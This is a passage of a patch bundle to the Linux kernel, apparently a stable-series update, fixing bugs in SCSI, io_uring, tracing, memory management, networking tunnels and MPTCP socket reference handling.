+ 	struct scsi_vpd __rcu *vpd_pg80;
+@@ -215,6 +216,7 @@ struct scsi_device {
+ 					 * creation time */
+ 	unsigned ignore_media_change:1; /* Ignore MEDIA CHANGE on resume */
+ 	unsigned silence_suspend:1;	/* Do not print runtime PM related messages */
++	unsigned no_vpd_size:1;		/* No VPD size reported in header */
+ 
+ 	unsigned int queue_stopped;	/* request queue is quiesced */
+ 	bool offline_already;		/* Device offline message logged */
+diff --git a/include/scsi/scsi_devinfo.h b/include/scsi/scsi_devinfo.h
+index 5d14adae21c78..6b548dc2c4965 100644
+--- a/include/scsi/scsi_devinfo.h
++++ b/include/scsi/scsi_devinfo.h
+@@ -32,7 +32,8 @@
+ #define BLIST_IGN_MEDIA_CHANGE	((__force blist_flags_t)(1ULL << 11))
+ /* do not do automatic start on add */
+ #define BLIST_NOSTARTONADD	((__force blist_flags_t)(1ULL << 12))
+-#define __BLIST_UNUSED_13	((__force blist_flags_t)(1ULL << 13))
++/* do not ask for VPD page size first on some broken targets */
++#define BLIST_NO_VPD_SIZE	((__force blist_flags_t)(1ULL << 13))
+ #define __BLIST_UNUSED_14	((__force blist_flags_t)(1ULL << 14))
+ #define __BLIST_UNUSED_15	((__force blist_flags_t)(1ULL << 15))
+ #define __BLIST_UNUSED_16	((__force blist_flags_t)(1ULL << 16))
+@@ -74,8 +75,7 @@
+ #define __BLIST_HIGH_UNUSED (~(__BLIST_LAST_USED | \
+ 			       (__force blist_flags_t) \
+ 			       ((__force __u64)__BLIST_LAST_USED - 1ULL)))
+-#define __BLIST_UNUSED_MASK (__BLIST_UNUSED_13 | \
+-			     __BLIST_UNUSED_14 | \
++#define __BLIST_UNUSED_MASK (__BLIST_UNUSED_14 | \
+ 			     __BLIST_UNUSED_15 | \
+ 			     __BLIST_UNUSED_16 | \
+ 			     __BLIST_UNUSED_24 | \
+diff --git a/io_uring/msg_ring.c b/io_uring/msg_ring.c
+index 15602a136821b..be2695eb45ec1 100644
+--- a/io_uring/msg_ring.c
++++ b/io_uring/msg_ring.c
+@@ -183,7 +183,7 @@ static int io_msg_install_complete(struct io_kiocb *req, unsigned int issue_flag
+ 	 * completes with -EOVERFLOW, then the sender must ensure that a
+ 	 * later IORING_OP_MSG_RING delivers the message.
+ 	 */
+-	if (!io_post_aux_cqe(target_ctx, msg->user_data, msg->len, 0))
++	if (!io_post_aux_cqe(target_ctx, msg->user_data, ret, 0))
+ 		ret = -EOVERFLOW;
+ out_unlock:
+ 	io_double_unlock_ctx(target_ctx);
+@@ -210,6 +210,8 @@ static int io_msg_send_fd(struct io_kiocb *req, unsigned int issue_flags)
+ 	struct io_ring_ctx *ctx = req->ctx;
+ 	struct file *src_file = msg->src_file;
+ 
++	if (msg->len)
++		return -EINVAL;
+ 	if (target_ctx == ctx)
+ 		return -EINVAL;
+ 	if (target_ctx->flags & IORING_SETUP_R_DISABLED)
+diff --git a/kernel/events/core.c b/kernel/events/core.c
+index c4be13e50547b..8ae8a5055e205 100644
+--- a/kernel/events/core.c
++++ b/kernel/events/core.c
+@@ -2163,7 +2163,7 @@ static void perf_group_detach(struct perf_event *event)
+ 		/* Inherit group flags from the previous leader */
+ 		sibling->group_caps = event->group_caps;
+ 
+-		if (!RB_EMPTY_NODE(&event->group_node)) {
++		if (sibling->attach_state & PERF_ATTACH_CONTEXT) {
+ 			add_event_to_groups(sibling, event->ctx);
+ 
+ 			if (sibling->state == PERF_EVENT_STATE_ACTIVE)
+diff --git a/kernel/trace/ftrace.c b/kernel/trace/ftrace.c
+index 750aa3f08b25a..a47f7d93e32d2 100644
+--- a/kernel/trace/ftrace.c
++++ b/kernel/trace/ftrace.c
+@@ -1537,7 +1537,8 @@ static struct dyn_ftrace *lookup_rec(unsigned long start, unsigned long end)
+ 	key.flags = end;	/* overload flags, as it is unsigned long */
+ 
+ 	for (pg = ftrace_pages_start; pg; pg = pg->next) {
+-		if (end < pg->records[0].ip ||
++		if (pg->index == 0 ||
++		    end < pg->records[0].ip ||
+ 		    start >= (pg->records[pg->index - 1].ip + MCOUNT_INSN_SIZE))
+ 			continue;
+ 		rec = bsearch(&key, pg->records, pg->index,
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index b677f8d61deb1..1b692574fb0ca 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -5119,6 +5119,8 @@ loff_t tracing_lseek(struct file *file, loff_t offset, int whence)
+ static const struct file_operations tracing_fops = {
+ 	.open		= tracing_open,
+ 	.read		= seq_read,
++	.read_iter	= seq_read_iter,
++	.splice_read	= generic_file_splice_read,
+ 	.write		= tracing_write_stub,
+ 	.llseek		= tracing_lseek,
+ 	.release	= tracing_release,
+diff --git a/kernel/trace/trace_events_hist.c b/kernel/trace/trace_events_hist.c
+index 5edbf6b1da3f3..10d36f751fcdb 100644
+--- a/kernel/trace/trace_events_hist.c
++++ b/kernel/trace/trace_events_hist.c
+@@ -1334,6 +1334,9 @@ static const char *hist_field_name(struct hist_field *field,
+ {
+ 	const char *field_name = "";
+ 
++	if (WARN_ON_ONCE(!field))
++		return field_name;
++
+ 	if (level > 1)
+ 		return field_name;
+ 
+@@ -4199,6 +4202,15 @@ static int __create_val_field(struct hist_trigger_data *hist_data,
+ 		goto out;
+ 	}
+ 
++	/* Some types cannot be a value */
++	if (hist_field->flags & (HIST_FIELD_FL_GRAPH | HIST_FIELD_FL_PERCENT |
++				 HIST_FIELD_FL_BUCKET | HIST_FIELD_FL_LOG2 |
++				 HIST_FIELD_FL_SYM | HIST_FIELD_FL_SYM_OFFSET |
++				 HIST_FIELD_FL_SYSCALL | HIST_FIELD_FL_STACKTRACE)) {
++		hist_err(file->tr, HIST_ERR_BAD_FIELD_MODIFIER, errpos(field_str));
++		ret = -EINVAL;
++	}
++
+ 	hist_data->fields[val_idx] = hist_field;
+ 
+ 	++hist_data->n_vals;
+diff --git a/kernel/trace/trace_hwlat.c b/kernel/trace/trace_hwlat.c
+index d440ddd5fd8b2..c4945f8adc119 100644
+--- a/kernel/trace/trace_hwlat.c
++++ b/kernel/trace/trace_hwlat.c
+@@ -492,6 +492,10 @@ static int start_cpu_kthread(unsigned int cpu)
+ {
+ 	struct task_struct *kthread;
+ 
++	/* Do not start a new hwlatd thread if it is already running */
++	if (per_cpu(hwlat_per_cpu_data, cpu).kthread)
++		return 0;
++
+ 	kthread = kthread_run_on_cpu(kthread_fn, NULL, cpu, "hwlatd/%u");
+ 	if (IS_ERR(kthread)) {
+ 		pr_err(BANNER "could not start sampling thread\n");
+@@ -584,9 +588,6 @@ static int start_per_cpu_kthreads(struct trace_array *tr)
+ 	 */
+ 	cpumask_and(current_mask, cpu_online_mask, tr->tracing_cpumask);
+ 
+-	for_each_online_cpu(cpu)
+-		per_cpu(hwlat_per_cpu_data, cpu).kthread = NULL;
+-
+ 	for_each_cpu(cpu, current_mask) {
+ 		retval = start_cpu_kthread(cpu);
+ 		if (retval)
+diff --git a/mm/huge_memory.c b/mm/huge_memory.c
+index d6651be1aa520..7624d22f92278 100644
+--- a/mm/huge_memory.c
++++ b/mm/huge_memory.c
+@@ -2046,7 +2046,7 @@ static void __split_huge_zero_page_pmd(struct vm_area_struct *vma,
+ {
+ 	struct mm_struct *mm = vma->vm_mm;
+ 	pgtable_t pgtable;
+-	pmd_t _pmd;
++	pmd_t _pmd, old_pmd;
+ 	int i;
+ 
+ 	/*
+@@ -2057,7 +2057,7 @@ static void __split_huge_zero_page_pmd(struct vm_area_struct *vma,
+ 	 *
+ 	 * See Documentation/mm/mmu_notifier.rst
+ 	 */
+-	pmdp_huge_clear_flush(vma, haddr, pmd);
++	old_pmd = pmdp_huge_clear_flush(vma, haddr, pmd);
+ 
+ 	pgtable = pgtable_trans_huge_withdraw(mm, pmd);
+ 	pmd_populate(mm, &_pmd, pgtable);
+@@ -2066,6 +2066,8 @@ static void __split_huge_zero_page_pmd(struct vm_area_struct *vma,
+ 		pte_t *pte, entry;
+ 		entry = pfn_pte(my_zero_pfn(haddr), vma->vm_page_prot);
+ 		entry = pte_mkspecial(entry);
++		if (pmd_uffd_wp(old_pmd))
++			entry = pte_mkuffd_wp(entry);
+ 		pte = pte_offset_map(&_pmd, haddr);
+ 		VM_BUG_ON(!pte_none(*pte));
+ 		set_pte_at(mm, haddr, pte, entry);
+diff --git a/mm/mincore.c b/mm/mincore.c
+index a085a2aeabd8e..efdee2d03b53b 100644
+--- a/mm/mincore.c
++++ b/mm/mincore.c
+@@ -33,7 +33,7 @@ static int mincore_hugetlb(pte_t *pte, unsigned long hmask, unsigned long addr,
+ 	 * Hugepages under user process are always in RAM and never
+ 	 * swapped out, but theoretically it needs to be checked.
+ 	 */
+-	present = pte && !huge_pte_none(huge_ptep_get(pte));
++	present = pte && !huge_pte_none_mostly(huge_ptep_get(pte));
+ 	for (; addr != end; vec++, addr += PAGE_SIZE)
+ 		*vec = present;
+ 	walk->private = vec;
+diff --git a/net/9p/client.c b/net/9p/client.c
+index 622ec6a586eea..00a6d1e348768 100644
+--- a/net/9p/client.c
++++ b/net/9p/client.c
+@@ -1289,7 +1289,7 @@ int p9_client_create_dotl(struct p9_fid *ofid, const char *name, u32 flags,
+ 		 qid->type, qid->path, qid->version, iounit);
+ 
+ 	memmove(&ofid->qid, qid, sizeof(struct p9_qid));
+-	ofid->mode = mode;
++	ofid->mode = flags;
+ 	ofid->iounit = iounit;
+ 
+ free_and_error:
+diff --git a/net/dsa/slave.c b/net/dsa/slave.c
+index aab79c3552249..6711ddc0a3c7d 100644
+--- a/net/dsa/slave.c
++++ b/net/dsa/slave.c
+@@ -1899,6 +1899,7 @@ int dsa_slave_change_mtu(struct net_device *dev, int new_mtu)
+ 	int new_master_mtu;
+ 	int old_master_mtu;
+ 	int mtu_limit;
++	int overhead;
+ 	int cpu_mtu;
+ 	int err;
+ 
+@@ -1927,9 +1928,10 @@ int dsa_slave_change_mtu(struct net_device *dev, int new_mtu)
+ 			largest_mtu = slave_mtu;
+ 	}
+ 
+-	mtu_limit = min_t(int, master->max_mtu, dev->max_mtu);
++	overhead = dsa_tag_protocol_overhead(cpu_dp->tag_ops);
++	mtu_limit = min_t(int, master->max_mtu, dev->max_mtu + overhead);
+ 	old_master_mtu = master->mtu;
+-	new_master_mtu = largest_mtu + dsa_tag_protocol_overhead(cpu_dp->tag_ops);
++	new_master_mtu = largest_mtu + overhead;
+ 	if (new_master_mtu > mtu_limit)
+ 		return -ERANGE;
+ 
+@@ -1964,8 +1966,7 @@ int dsa_slave_change_mtu(struct net_device *dev, int new_mtu)
+ 
+ out_port_failed:
+ 	if (new_master_mtu != old_master_mtu)
+-		dsa_port_mtu_change(cpu_dp, old_master_mtu -
+-				    dsa_tag_protocol_overhead(cpu_dp->tag_ops));
++		dsa_port_mtu_change(cpu_dp, old_master_mtu - overhead);
+ out_cpu_failed:
+ 	if (new_master_mtu != old_master_mtu)
+ 		dev_set_mtu(master, old_master_mtu);
+diff --git a/net/ipv4/fib_frontend.c b/net/ipv4/fib_frontend.c
+index b5736ef16ed2d..390f4be7f7bec 100644
+--- a/net/ipv4/fib_frontend.c
++++ b/net/ipv4/fib_frontend.c
+@@ -576,6 +576,9 @@ static int rtentry_to_fib_config(struct net *net, int cmd, struct rtentry *rt,
+ 			cfg->fc_scope = RT_SCOPE_UNIVERSE;
+ 	}
+ 
++	if (!cfg->fc_table)
++		cfg->fc_table = RT_TABLE_MAIN;
++
+ 	if (cmd == SIOCDELRT)
+ 		return 0;
+ 
+diff --git a/net/ipv4/inet_hashtables.c b/net/ipv4/inet_hashtables.c
+index 7a13dd7f546b6..7b05315264b0c 100644
+--- a/net/ipv4/inet_hashtables.c
++++ b/net/ipv4/inet_hashtables.c
+@@ -828,8 +828,14 @@ bool inet_bind2_bucket_match_addr_any(const struct inet_bind2_bucket *tb, const
+ #if IS_ENABLED(CONFIG_IPV6)
+ 	struct in6_addr addr_any = {};
+ 
+-	if (sk->sk_family != tb->family)
++	if (sk->sk_family != tb->family) {
++		if (sk->sk_family == AF_INET)
++			return net_eq(ib2_net(tb), net) && tb->port == port &&
++				tb->l3mdev == l3mdev &&
++				ipv6_addr_equal(&tb->v6_rcv_saddr, &addr_any);
++
+ 		return false;
++	}
+ 
+ 	if (sk->sk_family == AF_INET6)
+ 		return net_eq(ib2_net(tb), net) && tb->port == port &&
+diff --git a/net/ipv4/ip_tunnel.c b/net/ipv4/ip_tunnel.c
+index de90b09dfe78f..2541083d49ad6 100644
+--- a/net/ipv4/ip_tunnel.c
++++ b/net/ipv4/ip_tunnel.c
+@@ -614,10 +614,10 @@ void ip_md_tunnel_xmit(struct sk_buff *skb, struct net_device *dev,
+ 	}
+ 
+ 	headroom += LL_RESERVED_SPACE(rt->dst.dev) + rt->dst.header_len;
+-	if (headroom > dev->needed_headroom)
+-		dev->needed_headroom = headroom;
++	if (headroom > READ_ONCE(dev->needed_headroom))
++		WRITE_ONCE(dev->needed_headroom, headroom);
+ 
+-	if (skb_cow_head(skb, dev->needed_headroom)) {
++	if (skb_cow_head(skb, READ_ONCE(dev->needed_headroom))) {
+ 		ip_rt_put(rt);
+ 		goto tx_dropped;
+ 	}
+@@ -800,10 +800,10 @@ void ip_tunnel_xmit(struct sk_buff *skb, struct net_device *dev,
+ 
+ 	max_headroom = LL_RESERVED_SPACE(rt->dst.dev) + sizeof(struct iphdr)
+ 			+ rt->dst.header_len + ip_encap_hlen(&tunnel->encap);
+-	if (max_headroom > dev->needed_headroom)
+-		dev->needed_headroom = max_headroom;
++	if (max_headroom > READ_ONCE(dev->needed_headroom))
++		WRITE_ONCE(dev->needed_headroom, max_headroom);
+ 
+-	if (skb_cow_head(skb, dev->needed_headroom)) {
++	if (skb_cow_head(skb, READ_ONCE(dev->needed_headroom))) {
+ 		ip_rt_put(rt);
+ 		DEV_STATS_INC(dev, tx_dropped);
+ 		kfree_skb(skb);
+diff --git a/net/ipv4/tcp_output.c b/net/ipv4/tcp_output.c
+index 71d01cf3c13eb..ba839e441450f 100644
+--- a/net/ipv4/tcp_output.c
++++ b/net/ipv4/tcp_output.c
+@@ -3605,7 +3605,7 @@ struct sk_buff *tcp_make_synack(const struct sock *sk, struct dst_entry *dst,
+ 	th->window = htons(min(req->rsk_rcv_wnd, 65535U));
+ 	tcp_options_write(th, NULL, &opts);
+ 	th->doff = (tcp_header_size >> 2);
+-	__TCP_INC_STATS(sock_net(sk), TCP_MIB_OUTSEGS);
++	TCP_INC_STATS(sock_net(sk), TCP_MIB_OUTSEGS);
+ 
+ #ifdef CONFIG_TCP_MD5SIG
+ 	/* Okay, we have all we need - do the md5 hash if needed */
+diff --git a/net/ipv6/ip6_tunnel.c b/net/ipv6/ip6_tunnel.c
+index 47b6607a13706..5e80e517f0710 100644
+--- a/net/ipv6/ip6_tunnel.c
++++ b/net/ipv6/ip6_tunnel.c
+@@ -1240,8 +1240,8 @@ route_lookup:
+ 	 */
+ 	max_headroom = LL_RESERVED_SPACE(dst->dev) + sizeof(struct ipv6hdr)
+ 			+ dst->header_len + t->hlen;
+-	if (max_headroom > dev->needed_headroom)
+-		dev->needed_headroom = max_headroom;
++	if (max_headroom > READ_ONCE(dev->needed_headroom))
++		WRITE_ONCE(dev->needed_headroom, max_headroom);
+ 
+ 	err = ip6_tnl_encap(skb, t, &proto, fl6);
+ 	if (err)
+diff --git a/net/iucv/iucv.c b/net/iucv/iucv.c
+index eb0295d900395..fc3fddeb6f36d 100644
+--- a/net/iucv/iucv.c
++++ b/net/iucv/iucv.c
+@@ -83,7 +83,7 @@ struct iucv_irq_data {
+ 	u16 ippathid;
+ 	u8  ipflags1;
+ 	u8  iptype;
+-	u32 res2[8];
++	u32 res2[9];
+ };
+ 
+ struct iucv_irq_list {
+diff --git a/net/mptcp/pm_netlink.c b/net/mptcp/pm_netlink.c
+index 10fe9771a852a..c0c45bf6787d2 100644
+--- a/net/mptcp/pm_netlink.c
++++ b/net/mptcp/pm_netlink.c
+@@ -993,9 +993,13 @@ out:
+ 	return ret;
+ }
+ 
++static struct lock_class_key mptcp_slock_keys[2];
++static struct lock_class_key mptcp_keys[2];
++
+ static int mptcp_pm_nl_create_listen_socket(struct sock *sk,
+ 					    struct mptcp_pm_addr_entry *entry)
+ {
++	bool is_ipv6 = sk->sk_family == AF_INET6;
+ 	int addrlen = sizeof(struct sockaddr_in);
+ 	struct sockaddr_storage addr;
+ 	struct socket *ssock;
+@@ -1012,6 +1016,18 @@ static int mptcp_pm_nl_create_listen_socket(struct sock *sk,
+ 	if (!newsk)
+ 		return -EINVAL;
+ 
++	/* The subflow socket lock is acquired nested inside the msk one
++	 * in several places, even by the TCP stack, and this msk is a kernel
++	 * socket: lockdep complains. Instead of propagating the _nested
++	 * modifiers in several places, re-init the lock class for the msk
++	 * socket to an mptcp-specific one.
++	 */
++	sock_lock_init_class_and_name(newsk,
++				      is_ipv6 ? "mlock-AF_INET6" : "mlock-AF_INET",
++				      &mptcp_slock_keys[is_ipv6],
++				      is_ipv6 ? "msk_lock-AF_INET6" : "msk_lock-AF_INET",
++				      &mptcp_keys[is_ipv6]);
++
+ 	lock_sock(newsk);
+ 	ssock = __mptcp_nmpc_socket(mptcp_sk(newsk));
+ 	release_sock(newsk);
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index bc6c1f62a6905..6c2577b93fd80 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -825,7 +825,6 @@ static bool __mptcp_finish_join(struct mptcp_sock *msk, struct sock *ssk)
+ 	if (sk->sk_socket && !ssk->sk_socket)
+ 		mptcp_sock_graft(ssk, sk->sk_socket);
+ 
+-	mptcp_propagate_sndbuf((struct sock *)msk, ssk);
+ 	mptcp_sockopt_sync_locked(msk, ssk);
+ 	return true;
+ }
+@@ -2344,7 +2343,6 @@ static void __mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 		goto out;
+ 	}
+ 
+-	sock_orphan(ssk);
+ 	subflow->disposable = 1;
+ 
+ 	/* if ssk hit tcp_done(), tcp_cleanup_ulp() cleared the related ops
+@@ -2352,15 +2350,25 @@ static void __mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 	 * reference owned by msk;
+ 	 */
+ 	if (!inet_csk(ssk)->icsk_ulp_ops) {
++		WARN_ON_ONCE(!sock_flag(ssk, SOCK_DEAD));
+ 		kfree_rcu(subflow, rcu);
++	} else if (msk->in_accept_queue && msk->first == ssk) {
++		/* if the first subflow moved to a close state, e.g. due to
++		 * incoming reset and we reach here before inet_child_forget()
++		 * the TCP stack could later try to close it via
++		 * inet_csk_listen_stop(), or deliver it to the user space via
++		 * accept().
++		 * We can't delete the subflow - or risk a double free - nor let
++		 * the msk survive - or it will be leaked in the non-accept scenario:
++		 * fallback and let TCP cope with the subflow cleanup.
++		 */
++		WARN_ON_ONCE(sock_flag(ssk, SOCK_DEAD));
++		mptcp_subflow_drop_ctx(ssk);
+ 	} else {
+ 		/* otherwise tcp will dispose of the ssk and subflow ctx */
+-		if (ssk->sk_state == TCP_LISTEN) {
+-			tcp_set_state(ssk, TCP_CLOSE);
+-			mptcp_subflow_queue_clean(sk, ssk);
+-			inet_csk_listen_stop(ssk);
++		if (ssk->sk_state == TCP_LISTEN)
+ 			mptcp_event_pm_listener(ssk, MPTCP_EVENT_LISTENER_CLOSED);
+-		}
++
+ 		__tcp_close(ssk, 0);
+ 
+ 		/* close acquired an extra ref */
+@@ -2400,9 +2408,10 @@ static unsigned int mptcp_sync_mss(struct sock *sk, u32 pmtu)
+ 	return 0;
+ }
+ 
+-static void __mptcp_close_subflow(struct mptcp_sock *msk)
++static void __mptcp_close_subflow(struct sock *sk)
+ {
+ 	struct mptcp_subflow_context *subflow, *tmp;
++	struct mptcp_sock *msk = mptcp_sk(sk);
+ 
+ 	might_sleep();
+ 
+@@ -2416,7 +2425,15 @@ static void __mptcp_close_subflow(struct mptcp_sock *msk)
+ 		if (!skb_queue_empty_lockless(&ssk->sk_receive_queue))
+ 			continue;
+ 
+-		mptcp_close_ssk((struct sock *)msk, ssk, subflow);
++		mptcp_close_ssk(sk, ssk, subflow);
++	}
++
++	/* if the MPC subflow has been closed before the msk is accepted,
++	 * msk will never be accept-ed, close it now
++	 */
++	if (!msk->first && msk->in_accept_queue) {
++		sock_set_flag(sk, SOCK_DEAD);
++		inet_sk_state_store(sk, TCP_CLOSE);
+ 	}
+ }
+ 
+@@ -2625,6 +2642,9 @@ static void mptcp_worker(struct work_struct *work)
+ 	__mptcp_check_send_data_fin(sk);
+ 	mptcp_check_data_fin(sk);
+ 
++	if (test_and_clear_bit(MPTCP_WORK_CLOSE_SUBFLOW, &msk->flags))
++		__mptcp_close_subflow(sk);
++
+ 	/* There is no point in keeping around an orphaned sk timedout or
+ 	 * closed, but we need the msk around to reply to incoming DATA_FIN,
+ 	 * even if it is orphaned and in FIN_WAIT2 state
+@@ -2640,9 +2660,6 @@ static void mptcp_worker(struct work_struct *work)
+ 		}
+ 	}
+ 
+-	if (test_and_clear_bit(MPTCP_WORK_CLOSE_SUBFLOW, &msk->flags))
+-		__mptcp_close_subflow(msk);
+-
+ 	if (test_and_clear_bit(MPTCP_WORK_RTX, &msk->flags))
+ 		__mptcp_retrans(sk);
+ 
+@@ -3073,6 +3090,7 @@ struct sock *mptcp_sk_clone(const struct sock *sk,
+ 	msk->local_key = subflow_req->local_key;
+ 	msk->token = subflow_req->token;
+ 	msk->subflow = NULL;
++	msk->in_accept_queue = 1;
+ 	WRITE_ONCE(msk->fully_established, false);
+ 	if (mp_opt->suboptions & OPTION_MPTCP_CSUMREQD)
+ 		WRITE_ONCE(msk->csum_enabled, true);
+@@ -3090,8 +3108,7 @@ struct sock *mptcp_sk_clone(const struct sock *sk,
+ 	security_inet_csk_clone(nsk, req);
+ 	bh_unlock_sock(nsk);
+ 
+-	/* keep a single reference */
+-	__sock_put(nsk);
++	/* note: the newly allocated socket refcount is 2 now */
+ 	return nsk;
+ }
+ 
+@@ -3147,8 +3164,6 @@ static struct sock *mptcp_accept(struct sock *sk, int flags, int *err,
+ 			goto out;
+ 		}
+ 
+-		/* acquire the 2nd reference for the owning socket */
+-		sock_hold(new_mptcp_sock);
+ 		newsk = new_mptcp_sock;
+ 		MPTCP_INC_STATS(sock_net(sk), MPTCP_MIB_MPCAPABLEPASSIVEACK);
+ 	} else {
+@@ -3696,25 +3711,10 @@ static int mptcp_stream_accept(struct socket *sock, struct socket *newsock,
+ 		struct sock *newsk = newsock->sk;
+ 
+ 		set_bit(SOCK_CUSTOM_SOCKOPT, &newsock->flags);
++		msk->in_accept_queue = 0;
+ 
+ 		lock_sock(newsk);
+ 
+-		/* PM/worker can now acquire the first subflow socket
+-		 * lock without racing with listener queue cleanup,
+-		 * we can notify it, if needed.
+-		 *
+-		 * Even if remote has reset the initial subflow by now
+-		 * the refcnt is still at least one.
+-		 */
+-		subflow = mptcp_subflow_ctx(msk->first);
+-		list_add(&subflow->node, &msk->conn_list);
+-		sock_hold(msk->first);
+-		if (mptcp_is_fully_established(newsk))
+-			mptcp_pm_fully_established(msk, msk->first, GFP_KERNEL);
+-
+-		mptcp_rcv_space_init(msk, msk->first);
+-		mptcp_propagate_sndbuf(newsk, msk->first);
+-
+ 		/* set ssk->sk_socket of accept()ed flows to mptcp socket.
+ 		 * This is needed so NOSPACE flag can be set from tcp stack.
+ 		 */
+diff --git a/net/mptcp/protocol.h b/net/mptcp/protocol.h
+index 601469249da80..644cf0686f341 100644
+--- a/net/mptcp/protocol.h
++++ b/net/mptcp/protocol.h
+@@ -295,7 +295,8 @@ struct mptcp_sock {
+ 	u8		recvmsg_inq:1,
+ 			cork:1,
+ 			nodelay:1,
+-			fastopening:1;
++			fastopening:1,
++			in_accept_queue:1;
+ 	int		connect_flags;
+ 	struct work_struct work;
+ 	struct sk_buff  *ooo_last_skb;
+@@ -628,7 +629,6 @@ void mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 		     struct mptcp_subflow_context *subflow);
+ void __mptcp_subflow_send_ack(struct sock *ssk);
+ void mptcp_subflow_reset(struct sock *ssk);
+-void mptcp_subflow_queue_clean(struct sock *sk, struct sock *ssk);
+ void mptcp_sock_graft(struct sock *sk, struct socket *parent);
+ struct socket *__mptcp_nmpc_socket(const struct mptcp_sock *msk);
+ bool __mptcp_close(struct sock *sk, long timeout);
+@@ -666,6 +666,8 @@ void mptcp_subflow_set_active(struct mptcp_subflow_context *subflow);
+ 
+ bool mptcp_subflow_active(struct mptcp_subflow_context *subflow);
+ 
++void mptcp_subflow_drop_ctx(struct sock *ssk);
++
+ static inline void mptcp_subflow_tcp_fallback(struct sock *sk,
+ 					      struct mptcp_subflow_context *ctx)
+ {
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index 32904c76c6a17..8f6e48e5db2ce 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -396,10 +396,15 @@ void mptcp_subflow_reset(struct sock *ssk)
+ 	struct mptcp_subflow_context *subflow = mptcp_subflow_ctx(ssk);
+ 	struct sock *sk = subflow->conn;
+ 
++	/* mptcp_mp_fail_no_response() can reach here on an already closed
++	 * socket
++	 */
++	if (ssk->sk_state == TCP_CLOSE)
++		return;
++
+ 	/* must hold: tcp_done() could drop last reference on parent */
+ 	sock_hold(sk);
+ 
+-	tcp_set_state(ssk, TCP_CLOSE);
+ 	tcp_send_active_reset(ssk, GFP_ATOMIC);
+ 	tcp_done(ssk);
+ 	if (!test_and_set_bit(MPTCP_WORK_CLOSE_SUBFLOW, &mptcp_sk(sk)->flags) &&
+@@ -621,7 +626,7 @@ static struct request_sock_ops mptcp_subflow_v6_request_sock_ops __ro_after_init
+ static struct tcp_request_sock_ops subflow_request_sock_ipv6_ops __ro_after_init;
+ static struct inet_connection_sock_af_ops subflow_v6_specific __ro_after_init;
+ static struct inet_connection_sock_af_ops subflow_v6m_specific __ro_after_init;
+-static struct proto tcpv6_prot_override;
++static struct proto tcpv6_prot_override __ro_after_init;
+ 
+ static int subflow_v6_conn_request(struct sock *sk, struct sk_buff *skb)
+ {
+@@ -692,9 +697,10 @@ static bool subflow_hmac_valid(const struct request_sock *req,
+ 
+ static void mptcp_force_close(struct sock *sk)
+ {
+-	/* the msk is not yet exposed to user-space */
++	/* the msk is not yet exposed to user-space, and refcount is 2 */
+ 	inet_sk_state_store(sk, TCP_CLOSE);
+ 	sk_common_release(sk);
++	sock_put(sk);
+ }
+ 
+ static void subflow_ulp_fallback(struct sock *sk,
+@@ -710,7 +716,7 @@ static void subflow_ulp_fallback(struct sock *sk,
+ 	mptcp_subflow_ops_undo_override(sk);
+ }
+ 
+-static void subflow_drop_ctx(struct sock *ssk)
++void mptcp_subflow_drop_ctx(struct sock *ssk)
+ {
+ 	struct mptcp_subflow_context *ctx = mptcp_subflow_ctx(ssk);
+ 
+@@ -749,6 +755,7 @@ static struct sock *subflow_syn_recv_sock(const struct sock *sk,
+ 	struct mptcp_options_received mp_opt;
+ 	bool fallback, fallback_is_fatal;
+ 	struct sock *new_msk = NULL;
++	struct mptcp_sock *owner;
+ 	struct sock *child;
+ 
+ 	pr_debug("listener=%p, req=%p, conn=%p", listener, req, listener->conn);
+@@ -815,7 +822,7 @@ create_child:
+ 
+ 			if (new_msk)
+ 				mptcp_copy_inaddrs(new_msk, child);
+-			subflow_drop_ctx(child);
++			mptcp_subflow_drop_ctx(child);
+ 			goto out;
+ 		}
+ 
+@@ -823,6 +830,8 @@ create_child:
+ 		ctx->setsockopt_seq = listener->setsockopt_seq;
+ 
+ 		if (ctx->mp_capable) {
++			owner = mptcp_sk(new_msk);
++
+ 			/* this can't race with mptcp_close(), as the msk is
+ 			 * not yet exposted to user-space
+ 			 * not yet exposed to user-space
+@@ -831,14 +840,14 @@ create_child:
+ 			/* record the newly created socket as the first msk
+ 			 * subflow, but don't link it yet into conn_list
+ 			 */
+-			WRITE_ONCE(mptcp_sk(new_msk)->first, child);
++			WRITE_ONCE(owner->first, child);
+ 
+ 			/* new mpc subflow takes ownership of the newly
+ 			 * created mptcp socket
+ 			 */
+ 			mptcp_sk(new_msk)->setsockopt_seq = ctx->setsockopt_seq;
+-			mptcp_pm_new_connection(mptcp_sk(new_msk), child, 1);
+-			mptcp_token_accept(subflow_req, mptcp_sk(new_msk));
++			mptcp_pm_new_connection(owner, child, 1);
++			mptcp_token_accept(subflow_req, owner);
+ 			ctx->conn = new_msk;
+ 			new_msk = NULL;
+ 
+@@ -846,15 +855,21 @@ create_child:
+ 			 * uses the correct data
+ 			 */
+ 			mptcp_copy_inaddrs(ctx->conn, child);
++			mptcp_propagate_sndbuf(ctx->conn, child);
++
++			mptcp_rcv_space_init(owner, child);
++			list_add(&ctx->node, &owner->conn_list);
++			sock_hold(child);
+ 
+ 			/* with OoO packets we can reach here without ingress
+ 			 * mpc option
+ 			 */
+-			if (mp_opt.suboptions & OPTION_MPTCP_MPC_ACK)
++			if (mp_opt.suboptions & OPTION_MPTCP_MPC_ACK) {
+ 				mptcp_subflow_fully_established(ctx, &mp_opt);
++				mptcp_pm_fully_established(owner, child, GFP_ATOMIC);
++				ctx->pm_notified = 1;
++			}
+ 		} else if (ctx->mp_join) {
+-			struct mptcp_sock *owner;
+-
+ 			owner = subflow_req->msk;
+ 			if (!owner) {
+ 				subflow_add_reset_reason(skb, MPTCP_RST_EPROHIBIT);
+@@ -898,7 +913,7 @@ out:
+ 	return child;
+ 
+ dispose_child:
+-	subflow_drop_ctx(child);
++	mptcp_subflow_drop_ctx(child);
+ 	tcp_rsk(req)->drop_req = true;
+ 	inet_csk_prepare_for_destroy_sock(child);
+ 	tcp_done(child);
+@@ -909,7 +924,7 @@ dispose_child:
+ }
+ 
